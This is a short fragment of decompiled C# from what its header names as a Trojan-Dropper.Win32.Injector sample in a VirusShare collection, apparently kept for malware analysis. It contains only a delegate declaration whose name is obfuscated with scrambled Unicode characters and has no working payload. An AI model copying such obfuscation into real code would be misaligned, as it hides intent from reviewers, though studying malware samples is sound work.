// Decompiled with JetBrains decompiler // Type: 쓹愐ꮫ쇮᪤餶 // Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe using System.Runtime.InteropServices; internal delegate string 쓹\uF0D2\uE728愐ꮫ쇮\u1AA4餶([In] object obj0);